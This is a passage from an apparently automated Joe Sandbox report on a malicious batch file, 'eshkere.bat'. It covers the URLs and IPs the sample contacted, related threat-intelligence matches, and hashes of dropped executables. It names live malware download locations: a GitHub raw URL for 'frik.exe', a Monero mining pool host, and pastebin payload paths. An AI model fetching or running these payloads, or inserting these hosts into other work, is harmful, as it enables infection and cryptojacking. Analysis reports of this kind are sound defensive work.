http://nuget.org/NuGet.exe	powershell.exe, 00000003.00000002.1542373154.00000257018D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1562183047.000002571006C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1562183047.00000257101AF000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0	powershell.exe, 00000003.00000002.1542373154.000002570171B000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://github.com/fruktoozik/qnfr/rawf	wusa.exe, 0000000E.00000002.1624575403.000002844E8C0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000003.00000002.1542373154.0000025700231000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000003.00000002.1542373154.0000025700231000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://github.com	powershell.exe, 00000003.00000002.1542373154.0000025701347000.00000004.00000800.00020000.00000000.sdmp	true		unknown
https://go.micro	powershell.exe, 00000003.00000002.1542373154.0000025700C31000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/License	powershell.exe, 00000003.00000002.1562183047.00000257101AF000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000003.00000002.1562183047.00000257101AF000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ocsp.digicert.co	powershell.exe, 00000003.00000002.1542373154.000002570162B000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://github.com/Pester/Pester	powershell.exe, 00000003.00000002.1542373154.0000025700231000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://github.com	powershell.exe, 00000003.00000002.1542373154.000002570160E000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://github.com/fruktoozik/qnfr/raw/refs/heads/main/frik.exeUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGP	sc.exe, 0000001C.00000002.1671409015.000001DA1CD00000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://ocsp.digicert.coductVersion124	powershell.exe, 00000003.00000002.1542373154.00000257016A5000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://raw.githubusercontent.com	powershell.exe, 00000003.00000002.1542373154.0000025701633000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://github.com/	powershell.exe, 00000003.00000002.1564853812.000002576D6DD000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://ocsp.digicert.cod	powershell.exe, 00000003.00000002.1542373154.00000257016A5000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://www.drweb.ru/	1348.exe, 00000006.00000003.1629890366.000002007ECE0000.00000004.00000001.00020000.00000000.sdmp, Chrome.exe, 0000001F.00000003.1667557694.00000147A4500000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://contoso.com/	powershell.exe, 00000003.00000002.1562183047.00000257101AF000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000003.00000002.1542373154.00000257018D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1562183047.000002571006C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1562183047.00000257101AF000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://raw.githubusercontent.com	powershell.exe, 00000003.00000002.1542373154.000002570164A000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://oneget.orgX	powershell.exe, 00000003.00000002.1542373154.000002570171B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.kaspersky.ru/downloads/free-virus-removal-tool	1348.exe, 00000006.00000003.1629890366.000002007ECE0000.00000004.00000001.00020000.00000000.sdmp, Chrome.exe, 0000001F.00000003.1667557694.00000147A4500000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://aka.ms/pscore68	powershell.exe, 00000003.00000002.1542373154.0000025700001000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000003.00000002.1542373154.0000025700001000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://oneget.org	powershell.exe, 00000003.00000002.1542373154.000002570171B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.micros	powershell.exe, 00000003.00000002.1568771405.000002576F85E000.00000004.00000020.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
95.179.241.203	pool.hashvault.pro	Netherlands	20473	AS-CHOOPAUS	true
104.20.4.235	pastebin.com	United States	13335	CLOUDFLARENETUS	true
185.199.109.133	raw.githubusercontent.com	Netherlands	54113	FASTLYUS	false
140.82.121.4	github.com	United States	36459	GITHUBUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1528950
Start date and time:	2024-10-08 14:01:17 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 51s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	52
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	eshkere.bat
Detection:	MAL
Classification:	mal100.troj.adwa.expl.evad.mine.winBAT@70/18@4/4
EGA Information:	Successful, ratio: 25%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .bat Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target 1348.exe, PID 6592 because it is empty
Execution Graph export aborted for target Chrome.exe, PID 1868 because it is empty
Execution Graph export aborted for target powershell.exe, PID 4872 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: eshkere.bat

Simulations

Behavior and APIs

Time	Type	Description
08:02:20	API Interceptor	81x Sleep call for process: powershell.exe modified
08:02:35	API Interceptor	1x Sleep call for process: 1348.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
95.179.241.203	C5Lg2JSPlD.exe	Get hash	malicious	SilentXMRMiner, Xmrig	Browse
	PT54FFSL7ET46RASB.exe	Get hash	malicious	LummaC, PureLog Stealer, Xmrig, zgRAT	Browse
	file.exe	Get hash	malicious	Xmrig	Browse
	66dd2c2d3b88f_opera.exe	Get hash	malicious	Xmrig	Browse
	gutpOKDunr.exe	Get hash	malicious	Xmrig	Browse
	SecuriteInfo.com.FileRepMalware.3253.21057.exe	Get hash	malicious	Xmrig	Browse
	sc7Qi5VdE1.exe	Get hash	malicious	Xmrig	Browse
	II.exe	Get hash	malicious	Xmrig	Browse
	E5r67vtBtc6.exe	Get hash	malicious	Xmrig	Browse
	Miner-XMR2.exe	Get hash	malicious	Xmrig	Browse
104.20.4.235	sostener.vbs	Get hash	malicious	Njrat	Browse	pastebin.com/raw/V9y5Q5vv
	sostener.vbs	Get hash	malicious	XWorm	Browse	pastebin.com/raw/V9y5Q5vv
	envifa.vbs	Get hash	malicious	Remcos	Browse	pastebin.com/raw/V9y5Q5vv
	New Voicemail Invoice 64746w .js	Get hash	malicious	WSHRAT	Browse	pastebin.com/raw/NsQ5qTHr
	Invoice Payment N8977823.js	Get hash	malicious	WSHRAT	Browse	pastebin.com/raw/NsQ5qTHr
	Pending_Invoice_Bank_Details_XLSX.js	Get hash	malicious	WSHRAT	Browse	pastebin.com/raw/NsQ5qTHr
	Pending_Invoice_Bank_Details_kofce_.JS.js	Get hash	malicious	WSHRAT	Browse	pastebin.com/raw/NsQ5qTHr
	Update on Payment.js	Get hash	malicious	WSHRAT	Browse	pastebin.com/raw/NsQ5qTHr
185.199.109.133	SecuriteInfo.com.Trojan.GenericKD.74126573.27896.28845.dll	Get hash	malicious	Metasploit	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt
185.199.109.133	SecuriteInfo.com.Win64.MalwareX-gen.11827.5130.dll	Get hash	malicious	AsyncRAT, XWorm	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
pool.hashvault.pro	Google Chrome.exe	Get hash	malicious	Xmrig	Browse	45.76.89.70
	e7WMhx18XN.exe	Get hash	malicious	SilentXMRMiner, Xmrig	Browse	45.76.89.70
	GcqJPBLD2Q.exe	Get hash	malicious	BitCoin Miner, SilentXMRMiner, UACMe, Xmrig	Browse	45.76.89.70
	C5Lg2JSPlD.exe	Get hash	malicious	SilentXMRMiner, Xmrig	Browse	95.179.241.203
	file.exe	Get hash	malicious	RDPWrap Tool, Amadey, Socks5Systemz, Stealc, Vidar, Xmrig	Browse	45.76.89.70
	file.exe	Get hash	malicious	Xmrig	Browse	45.76.89.70
	PT54FFSL7ET46RASB.exe	Get hash	malicious	LummaC Stealer, PureLog Stealer, Xmrig, zgRAT	Browse	142.202.242.43
	PT54FFSL7ET46RASB.exe	Get hash	malicious	LummaC, PureLog Stealer, Xmrig, zgRAT	Browse	95.179.241.203
	o9OIGsDt4m.exe	Get hash	malicious	Xmrig	Browse	95.179.241.203
	file.exe	Get hash	malicious	Xmrig	Browse	95.179.241.203
raw.githubusercontent.com	po 1105670313_pdf.vbs	Get hash	malicious	Unknown	Browse	185.199.109.133
	scan_374783.js	Get hash	malicious	AgentTesla	Browse	185.199.110.133
	invoice_45009.xls	Get hash	malicious	Remcos	Browse	185.199.111.133
	Payment.vbs	Get hash	malicious	FormBook	Browse	185.199.111.133
	PAYMENT SPECIFIKACIJA 364846637-pdf.vbs	Get hash	malicious	Remcos	Browse	185.199.108.133
	OTO2wVGgkl.exe	Get hash	malicious	Unknown	Browse	185.199.111.133
	k4STQvJ6rV.vbs	Get hash	malicious	XWorm	Browse	185.199.108.133
	Request For Quotation.js	Get hash	malicious	AgentTesla	Browse	185.199.108.133
	PO.78NO9.xls	Get hash	malicious	FormBook	Browse	185.199.108.133
	Company Profile.vbs	Get hash	malicious	Unknown	Browse	185.199.108.133
github.com	SecuriteInfo.com.PUA.Tool.InstSrv.3.16098.13705.exe	Get hash	malicious	Unknown	Browse	140.82.121.4
	SecuriteInfo.com.PUA.Tool.InstSrv.3.16098.13705.exe	Get hash	malicious	Unknown	Browse	140.82.121.4
	SecuriteInfo.com.Win64.MalwareX-gen.19388.23445.exe	Get hash	malicious	Unknown	Browse	140.82.121.3
	SecuriteInfo.com.Win64.MalwareX-gen.19388.23445.exe	Get hash	malicious	Unknown	Browse	140.82.121.4
	SecuriteInfo.com.Win64.MalwareX-gen.19388.23445.exe	Get hash	malicious	Unknown	Browse	140.82.121.3
	na.elf	Get hash	malicious	DeadBolt	Browse	140.82.121.9

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AS-CHOOPAUS	Google Chrome.exe	Get hash	malicious	Xmrig	Browse	45.76.89.70
	SecuriteInfo.com.PUA.Tool.InstSrv.3.16098.13705.exe	Get hash	malicious	Unknown	Browse	45.76.78.62
	SecuriteInfo.com.PUA.Tool.InstSrv.3.16098.13705.exe	Get hash	malicious	Unknown	Browse	45.76.78.62
	na.elf	Get hash	malicious	Unknown	Browse	45.32.242.21
	e7WMhx18XN.exe	Get hash	malicious	SilentXMRMiner, Xmrig	Browse	45.76.89.70
	GcqJPBLD2Q.exe	Get hash	malicious	BitCoin Miner, SilentXMRMiner, UACMe, Xmrig	Browse	45.76.89.70
	C5Lg2JSPlD.exe	Get hash	malicious	SilentXMRMiner, Xmrig	Browse	95.179.241.203
	na.elf	Get hash	malicious	Mirai	Browse	66.42.126.39
	z3hir.x86.elf	Get hash	malicious	Mirai	Browse	44.172.145.8
	arm7-20241006-0950.elf	Get hash	malicious	Unknown	Browse	108.61.212.64
FASTLYUS	FIR-069114.pdf	Get hash	malicious	HTMLPhisher	Browse	151.101.194.137
	phish_alert_sp2_2.0.0.0.eml	Get hash	malicious	Phisher	Browse	151.101.2.137
	https://u9313450.ct.sendgrid.net/ls/click?upn=u001.ZfA-2BqTl2mXIVteOCc-2BANg3DC2QYjSoauaoyveU6MGzQ5VY-2FjA-2F-2FRincDy1KlklBXiPJP_QABV8lal1FXq8md0G3-2FIRFNEx2OV-2FLWSv5ByAZvXcaLdzn8wfCvTlDds0ovRZhRFzHNfaxKr2UfovDpEFdLigcTlhUu24CyUOQvOCn6w-2BHb3x6-2BV4Gc9geo2lLTncL6JUMk6T71-2BqjLFsmgG-2BXpvetiYOby06i5CliURFDYqQTT1C2IqhXHNpvN85ZEXfc5YBJaPCdYG7GCx3syxYrFYTqrHhY55-2BpbwTxDCwDN1-2BlowHglPUt5r1G9-2FvJEFg-2F5ssADCqEBOqtEhmmm5GgEypOrZiDwmybFJCcbqY1CFgUEEhAhZH7kmvwleWNlpfoBd	Get hash	malicious	Unknown	Browse	151.101.65.195
	sakura	Get hash	malicious	Unknown	Browse	151.101.67.6
	https://we.tl/t-BVtGtb0HLz	Get hash	malicious	Unknown	Browse	151.101.192.84
	po 1105670313_pdf.vbs	Get hash	malicious	Unknown	Browse	185.199.109.133
	https://docs.google.com/drawings/u/0/d/1upFXiljnDLvdOIt1Aoe3r44ZCVNRtnjt0CV6fZcs1no/preview?usp=sharing&pli=1	Get hash	malicious	HTMLPhisher	Browse	151.101.66.137
	copyright_infringement_evidence_1.exe	Get hash	malicious	Unknown	Browse	185.199.109.133
	https://Vv.ndlevesio.com/vrbU/	Get hash	malicious	Unknown	Browse	151.101.194.137
	Audio_Msg..00293614554893Transcript.html	Get hash	malicious	Unknown	Browse	151.101.194.137
CLOUDFLARENETUS	Google Chrome.exe	Get hash	malicious	Xmrig	Browse	172.67.19.24
	FIR-069114.pdf	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	phish_alert_sp2_2.0.0.0.eml	Get hash	malicious	Phisher	Browse	104.17.25.14
	http://us-east-1.oortech.com	Get hash	malicious	Unknown	Browse	1.1.1.1
	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	https://u9313450.ct.sendgrid.net/ls/click?upn=u001.ZfA-2BqTl2mXIVteOCc-2BANg3DC2QYjSoauaoyveU6MGzQ5VY-2FjA-2F-2FRincDy1KlklBXiPJP_QABV8lal1FXq8md0G3-2FIRFNEx2OV-2FLWSv5ByAZvXcaLdzn8wfCvTlDds0ovRZhRFzHNfaxKr2UfovDpEFdLigcTlhUu24CyUOQvOCn6w-2BHb3x6-2BV4Gc9geo2lLTncL6JUMk6T71-2BqjLFsmgG-2BXpvetiYOby06i5CliURFDYqQTT1C2IqhXHNpvN85ZEXfc5YBJaPCdYG7GCx3syxYrFYTqrHhY55-2BpbwTxDCwDN1-2BlowHglPUt5r1G9-2FvJEFg-2F5ssADCqEBOqtEhmmm5GgEypOrZiDwmybFJCcbqY1CFgUEEhAhZH7kmvwleWNlpfoBd	Get hash	malicious	Unknown	Browse	104.17.246.203
	PURCHASED ORDER OF ENG091.exe	Get hash	malicious	FormBook	Browse	104.21.93.17
	http://nbxvavlbbnks0ockyfxgnbxva.feedbackfusion.site/4nbXVA123415bxwz821wfgqkoqbno9030GRUYZVSMVMDWDTG236348/3210Y21	Get hash	malicious	Unknown	Browse	104.22.51.98
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
	Siparis PO# DT-TE-160924R0 _323282-_563028621286 pdf .exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	JFFjXW16yR.exe	Get hash	malicious	DarkCloud, PureLog Stealer, zgRAT	Browse	185.199.109.133 140.82.121.4
	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	185.199.109.133 140.82.121.4
	SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	Get hash	malicious	AgentTesla	Browse	185.199.109.133 140.82.121.4
	NXPYoHNSgv.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	185.199.109.133 140.82.121.4
	SWIFT 103 202410071519130850 071024.pdf.vbs	Get hash	malicious	Remcos	Browse	185.199.109.133 140.82.121.4
	QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	185.199.109.133 140.82.121.4
	po 1105670313_pdf.vbs	Get hash	malicious	Unknown	Browse	185.199.109.133 140.82.121.4
	PO_89_202876.Pdf.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	185.199.109.133 140.82.121.4
	QUOTATIONS#08673.exe	Get hash	malicious	AgentTesla	Browse	185.199.109.133 140.82.121.4
	shipping.exe	Get hash	malicious	AgentTesla	Browse	185.199.109.133 140.82.121.4

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Windows\Temp\lhaqmlexwhjs.sys	Google Chrome.exe	Get hash	malicious	Xmrig	Browse
	e7WMhx18XN.exe	Get hash	malicious	SilentXMRMiner, Xmrig	Browse
	GcqJPBLD2Q.exe	Get hash	malicious	BitCoin Miner, SilentXMRMiner, UACMe, Xmrig	Browse
	C5Lg2JSPlD.exe	Get hash	malicious	SilentXMRMiner, Xmrig	Browse
	TwrhjEKqxk.exe	Get hash	malicious	Xmrig	Browse
	aA45th2ixY.exe	Get hash	malicious	Xmrig	Browse
	1mqzOM6eok.exe	Get hash	malicious	Xmrig	Browse
	updater.exe	Get hash	malicious	Xmrig	Browse
	7QiAmg58Jk.exe	Get hash	malicious	Metasploit, Meterpreter, Xmrig	Browse
	LnK0dS8jcA.exe	Get hash	malicious	Xmrig	Browse

Created / dropped Files

C:\ProgramData\Chrome.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\1348.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	5288736
Entropy (8bit):	6.538032311597454
Encrypted:	false
SSDEEP:	98304:yGp6tj9L5rremSnrC7ag91f3dOuyUPpSJawwSDJiRRiy5CevO+OGLUA:J6N96ut9xwUPpSDwMiRsKhhpX
MD5:	1A67A432E7AB0BCD2189F3F4142F2AE4
SHA1:	168307B08E5C7A740D7DFCAA4BE93E02F80E3FB9
SHA-256:	D19E4B7894FE7E6190D942C5718BB61B95B0FFD7380CB056891508CA6D163432
SHA-512:	F849EA7BA3BD6865935065D542247A9256C0CCC669F9F57639E44C374C4AA3B03FF4A33F956F6027CB5AA97069EC5B9EB943C1D57034CC7D9821F52F44FFDE9B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 76%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...!O.g.........."...........O.....@..........@..............................Q...........`.....................................................<.....P..)....P.......P. )....P.x...............................(.......8...............x............................text.............................. ..`.rdata...&.......(..................@..@.data....O.......O.................@....pdata........P......XP.............@..@.00cfg........P......ZP.............@..@.tls..........P......\P.............@....rsrc....)....P..*...^P.............@..@.reloc..x.....P.......P.............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\1348.exe

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	5288736
Entropy (8bit):	6.538032311597454
Encrypted:	false
SSDEEP:	98304:yGp6tj9L5rremSnrC7ag91f3dOuyUPpSJawwSDJiRRiy5CevO+OGLUA:J6N96ut9xwUPpSDwMiRsKhhpX
MD5:	1A67A432E7AB0BCD2189F3F4142F2AE4
SHA1:	168307B08E5C7A740D7DFCAA4BE93E02F80E3FB9
SHA-256:	D19E4B7894FE7E6190D942C5718BB61B95B0FFD7380CB056891508CA6D163432
SHA-512:	F849EA7BA3BD6865935065D542247A9256C0CCC669F9F57639E44C374C4AA3B03FF4A33F956F6027CB5AA97069EC5B9EB943C1D57034CC7D9821F52F44FFDE9B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 76%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...!O.g.........."...........O.....@..........@..............................Q...........`.....................................................<.....P..)....P.......P. )....P.x...............................(.......8...............x............................text.............................. ..`.rdata...&.......(..................@..@.data....O.......O.................@....pdata........P......XP.............@..@.00cfg........P......ZP.............@..@.tls..........P......\P.............@....rsrc....)....P..*...^P.............@..@.reloc..x.....P.......P.............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aidyod01.phk.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d40aw3j0.bta.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_elhhx1av.bhd.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gay0ae0w.aip.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mzu3hwdv.fdf.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_og2z4uv5.rzp.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ygtrmnw4.yrk.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zmmirluw.g1a.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

